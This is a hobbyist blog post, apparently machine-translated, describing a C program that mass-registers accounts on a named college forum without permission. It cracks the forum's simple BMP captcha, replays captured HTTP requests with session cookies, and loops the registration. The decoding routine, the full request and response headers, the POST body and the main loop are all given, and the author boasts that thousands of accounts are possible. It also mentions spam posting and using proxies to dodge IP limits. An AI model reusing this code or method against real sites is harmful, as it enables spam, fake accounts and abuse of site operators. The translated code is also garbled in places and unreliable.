I recently learned the HTTP protocol and found that I can write a program to simulate user registration, post and other programs !! I searched the internet and found that this kind of program is called a Web page registration machine. users can be self-registered in a crazy way, or even publish advertisement posts, all of which are directly completed by a program. in essence, it is similar to the process of submitting a browser for registration.
Well, I'll write it. I found that the most difficult thing about this registration machine is how to crack the verification code. Forget it. cainiao will find a website without the verification code! So I went to our school forum and saw that the verification code was not needed during registration. All right, you're done! (Later I found this forum really annoying). The School Forum was written in PHP. I captured packets to analyze the data packets I registered and then simulated the registration process, but finally failed !!! Finally, we found that it was related to the information in the cookie. We can see what cookies it sent me:
Set-COOKIE: np6q_2132_sid = 33 grgh; expires = wed, 09-may-2012 12:55:47 GMT; Path =/
Set-COOKIE: np6q_2132_lastact = 1336481747% 09member. php % 09 register; expires = wed, 09-may-2012 12:55:47 GMT; Path =/
Set-COOKIE: np6q_2132_cloudstatpost = deleted; expires = Mon, 09-may-2011 12:55:46 GMT; Path =/
Set-COOKIE: np6q_2132_sid = 33 grgh; expires = wed, 09-may-2012 12:55:47 GMT; Path =/
There are a bunch of other cookies. I have analyzed this cookie for a long time and changed a lot of key values, but it still doesn't work. I don't know the path or the form is wrong. I disabled cookies and registered them using a browser. I cannot understand this cookie, and this forum can only register one user within three hours of the same IPaddress !! I tried to use a proxy, but if I used an agent, I said that I would register again three hours later. I cried at the time. I got down and couldn't help you !!
After the first failure, I had a lot of enthusiasm, but I insisted on it. Look for forums in other schools to see it ~~~ So I came to the South China University of Technology Forum. His mother had abnormal verification codes and verification questions and answers.
Forget it. This is not something that humans can do. If you are an Engineering College, find a liberal arts college !! So I found a forum of a college in Guangdong, which was written by ASP. The Forum was very deserted and started selling. I saw from whois that this 2013 domain name expired.
Let's look at the verification code on his registration page:
This verification code is too simple to start.
Capture the packet and analyze the verification code file. Download the code. asp file and change it to the BMP file. After opening it with winhex, we will study how to get the binary code of the BMP file for a long time.
Finally, we found that 0-53 (decimal) is the BMP file header, and below 54 is the image content. Each three bytes is a pixel, and the bitmap file of the verification code is 40*10, the image content ranges from 54 to 1253, and each number point uses 300 bytes. and the image starts from the last line. after learning about this, it is easy to crack.
After receiving the verification code image, the image will be de-colored and become black and white.
Then, it is simplified because each 3 bytes represents a pixel, and I use a two-dimensional array to store the three bytes into 0101 of the One-byte.
Typedef struct number {
Char num [10] [10];
} Num;
Then write another program to get the 10*10 representation from 0-9:
// 0
,
,
,
,
,
,
,
,
,
,
// 1
1, 1, 1, 1, 1, 1, 1, 1,
,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1,
,
// 2
,
,
,
,
,
,
1, 1, 1, 1, 1, 1, 1, 1,
,
0, 1, 1, 1, 1, 1, 1, 1,
,
......
Convert the obtained Verification Code image to the above format, and then compare it to know the number of the corresponding verification code. The basic code is as follows:
Void getcode (char * buff, int recvsize) {unsigned char * P, * pnum, * pbase; int board, flag = 0, I, j; int H, L, N; // row, column, number of char mapbuff [40*10]; P = (unsigned char *) Buff; // a carriage return for 4e6 is the boundary, the following content is the image file for (board = 1; Board <recvsize + 1; Board ++) {If (* P = '4 ') & (* (p + 1) = 'E') & (* (p + 2) = '6') & (* (p + 3) = 0x0d) & (* (p + 4) = 0x0a) {P = P + 5; flag = 1; break;} p ++;} If (! Flag) return; // point to the start position of the first digit. pnum = P + 54; pbase = pnum; for (I = 54; I <recvsize; I ++) {// If (* pnum = 0xEE) * pnum = 0xff; else * pnum = 0x0; pnum ++;} pnum = pbase; for (I = 0; I <400; I ++) {// simplified the image, represented in 1010, stored in mapbuffif (* pnum = 0xff) mapbuff [I] = 1; elsemapbuff [I] = 0; pnum + = 3;} for (I = 0; I <400; I ++) {// place the number in dealnumn = I % 40/10; // The number of L = I % 40% 10; // The number of column H = 9-I/40; // The Nth line dealnum [N]. num [H] [l] = mapbuff [I];} for (I = 0; I <4; I ++) {for (j = 0; j <10; j ++) {If (check (& dealnum [I], & Wu [J]) {securitycode [I] = J; // Save the cracked Verification Code (final result) Break ;}}/ * file * FP; FP = fopen ("D:/1.bmp", "WB "); fwrite (P, 1, recvSize-board-4-7, FP); fclose (FP );*/}
The test is correct.
After the verification code is completed, nothing else is difficult. register an account with a browser and use the packet capture tool to capture the package. The approximate request header is as follows:
Request registration page:
GET/Reg. asp? Action= agree HTTP/1.1
HOST: harmony does not show. com
Connection: keep-alive
User-Agent: Mozilla/5.0 (windows; U; Windows NT 6.1; en-US) applewebkit/534.16 (khtml, like gecko) Chrome/10.0.648.151 Safari/534.16
Accept: Application/XML, application/XHTML + XML, text/html; q = 0.9, text/plain; q = 0.8, image/PNG, */*; q = 0.5
Accept-encoding: gzip, deflate, SDCh
Accept-language: ZH-CN, ZH; q = 0.8
Accept-charset: GBK, UTF-8; q = 0.7, *; q = 0.3
COOKIE: zym6kbbs1 = styleid = freshblue; tempcontent =; ajstat_ OK _pages = 4; ajstat_ OK _times = 3
Server Response:
HTTP/1.1 200 OK
Cache-control: Private
Date: Wed, 09 May 2012 15:46:58 GMT
Content-Length: 4521
Content-Type: text/html
Server: Microsoft-Microsoft IIS/6.0
X-powered-by: ASP. NET
Set-COOKIE: aspsessionidsqaraqdc = inlpkmdbmjemkdndfilpehjm; Path =/
A lot of Web Page HTML code ....
At this time, the server gave me a sessionid: "aspsessionidsqaraqdc = inlpkmdbmjemkdndfilpehjm" and saved the sessionid.
Then send a request to obtain the verification code:
GET/code. asp HTTP/1.1
HOST: harmony does not show. com
Connection: keep-alive
Referer: http://xhyes.com/reg.asp? Action = agree
User-Agent: Mozilla/5.0 (windows; U; Windows NT 6.1; en-US) applewebkit/534.16 (khtml, like gecko) Chrome/10.0.648.151 Safari/534.16
Accept :*/*
Accept-encoding: gzip, deflate, SDCh
Accept-language: ZH-CN, ZH; q = 0.8
Accept-charset: GBK, UTF-8; q = 0.7, *; q = 0.3
COOKIE: zym6kbbs1 = styleid = freshblue; tempcontent =; ajstat_ OK _pages = 4; ajstat_ OK _times = 3; aspsessionidsqaraqdc = inlpkmdbmjemkdndfilpehjm
You can see that when you request the verification code, you need to send the sessionid that the server just sent to me, so that the server will bind this sessionid with the verification code to be returned.
The server returns the verification code bitmap image:
HTTP/1.1 200 OK
Cache-control: Private
Date: Wed, 09 May 2012 15:46:58 GMT
Pragma: No-Cache
Transfer-encoding: chunked
Content-Type: image/BMP
Expires: Wed, 09 May 2012 15:45:58 GMT
Server: Microsoft-Microsoft IIS/6.0
X-powered-by: ASP. NET
Cache-ctrol: No-Cache
4e6
BM? 6 ((
? ? ? ? ? ? K? K
... A bunch of back-ends ........
Then, crack the obtained Verification Code image using the above method and obtain the verification code. At the same time, write the sessionid obtained above to the request parameter of the registered request header:
sprintf(postData,"name=helloworld%d&sex=1&password=123456&repassword=123456&email=sflsfsk@0sll.com&adminid=%d%d%d%d",nameNum, securityCode[0],securityCode[1],securityCode[2],securityCode[3]);
Then, send these items to the server, and the registration is successful !!!
Post/Reg. asp? Action = save HTTP/1.1
HOST: xhyes.com
Connection: keep-alive
Referer: http://xhyes.com/reg.asp? Action = agree
Content-Length: 165
Cache-control: Max-age = 0
Origin: http://xhyes.com
User-Agent: Mozilla/5.0 (windows; U; Windows NT 6.1; en-US) applewebkit/534.16 (khtml, like gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: Application/X-WWW-form-urlencoded
Accept: Application/XML, application/XHTML + XML, text/html; q = 0.9, text/plain; q = 0.8, image/PNG, */*; q = 0.5
Accept-encoding: gzip, deflate, SDCh
Accept-language: ZH-CN, ZH; q = 0.8
Accept-charset: GBK, UTF-8; q = 0.7, *; q = 0.3
COOKIE: zym6kbbs1 = styleid = freshblue; tempcontent =; aspsessionidsqaraqdc = inlpkmdbmjemkdndfilpehjm; ajstat_ OK _pages = 5; ajstat_ OK _times = 3
Name = helloworld1001 & sex = 1 & Password = 123456 & repassword = 123456 & Email = sflsfsk@0sll.com & adminid = 1036
The server returns the successful registration information:
HTTP/1.1 200 OK
Cache-control: Private
Date: Wed, 09 May 2012 15:48:04 GMT
Content-Length: 2006
Content-Type: text/html
Server: Microsoft-Microsoft IIS/6.0
X-powered-by: ASP. NET
... A bunch ....
The following information is displayed:
"</Div> <Div class = infobody> congratulations! <B> helloworld1001 </B> is successfully registered. <Br> · <a href = lo ............"
Success !!
The following is the main program block:
// Start to register ~~ For (I = 0; lichking <regnum; I ++, namenum ++) {sock = socket (af_inet, sock_stream, ipproto_tcp); Connect (sock, (sockaddr *) & desaddr, Len); // request the registration page to obtain sessionidinitpage (); makehttppagehdr (); send (sock, sendbuff, strlen (sendbuff), 0 ); size = Recv (sock, recvbuff, sizeof (recvbuff), 0); getsessionid (recvbuff, size); // get sessionidclosesocket (sock ); // construct the Response Header initcode (); makehttpcodehdr (); sock = socket (af_inet, sock_stream, ipproto_tcp); Connect (sock, (sockaddr *) & desaddr, Len ); // start to crack the verification code send (sock, sendbuff, strlen (sendbuff), 0); // send the verification code image request size = Recv (sock, recvbuff, sizeof (recvbuff ), 0); closesocket (sock); getcode (recvbuff, size); // obtain the verification code printf ("% s \ n", sessionid ); // printf ("% s \ n", recvbuff); printf ("% d \ n", securitycode [0], securitycode [1], securitycode [2], securitycode [3]); // start to register sleep (1000); sock = socket (af_inet, sock_stream, ipproto_tcp); Connect (sock, (sockaddr *) & desaddr, Len); int error = getlasterror (); initreg (); makehttpreghdr (); send (sock, sendbuff, strlen (sendbuff), 0 ); // send the registration request send (sock, Reg. string [0], strlen (Reg. string [0]), 0); size = Recv (sock, recvbuff, sizeof (recvbuff), 0); closesocket (sock); sleep (500 );}
The above is the principle of the program. Let's take a look at the effect of the program !!
The heap of letters is sessionid, and the four digits are the cracked verification code.
This is the number of website Members: the number of members was 1018 at that time. I think it was because I sent the announcement from the Administrator, because I got the website on the 9th yesterday. Haha ~~
This is the number of Members after my tests. I only registered about 50 accounts for the purpose of learning. if you want to register 1000 and 10000, it's okay ~~ However, this website has a slow response, which may take a long time. I guess the database used is access.
Announcement:
Thanks to Google and Bing for their final success, I am very happy. I have never been so happy !!! Hahaha
It can be said that this program is the first thing that has some value after I write so many useless programs (I think )!!! Are you happy ?! Are you not excited ??
However, my level can only be used to get those ASP sites. others cannot ~ At the same time, I should pay attention to security issues in programming.
Complete ~~~~